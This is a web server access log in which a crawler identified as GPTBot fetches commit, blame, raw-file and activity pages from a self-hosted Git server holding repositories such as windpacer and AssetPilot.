[Client 74.7.227.38] [Length 15486] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" -[17/Feb/2026:13:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 15546] [Gzip 9.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:13:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:13:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 5547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:13:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 2169] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" -[17/Feb/2026:13:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 4934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:13:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 17121] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" -[17/Feb/2026:13:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 229663] [Gzip 12.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:13:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 226088] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 17360] [Gzip 4.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 62007] [Gzip 15.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 15515] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 62020] [Gzip 15.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 56828] [Gzip 12.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" -[17/Feb/2026:13:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153441] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10990] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10865] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 151602] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71826] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/branches" [Client 74.7.227.38] [Length 10343] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" -[17/Feb/2026:13:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/yearly" [Client 74.7.227.38] [Length 8589] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" -[17/Feb/2026:13:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 61993] [Gzip 15.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=split&whitespace=ignore-all" -[17/Feb/2026:13:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/weekly" [Client 74.7.227.38] [Length 8592] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" -[17/Feb/2026:13:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/weekly" [Client 74.7.227.38] [Length 8389] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" -[17/Feb/2026:13:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/yearly" [Client 74.7.227.38] [Length 8578] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" -[17/Feb/2026:13:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 145119] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 69758] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71796] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 70525] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10109] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" -[17/Feb/2026:13:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10280] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" -[17/Feb/2026:13:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10088] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426" -[17/Feb/2026:13:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:13:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 22220] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" -[17/Feb/2026:13:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/releases.rss" [Client 74.7.227.38] [Length 350] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/releases" -[17/Feb/2026:13:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 133670] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2fclaude.md" [Client 74.7.227.38] [Length 28743] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" -[17/Feb/2026:13:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 151605] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137890] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 135168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr 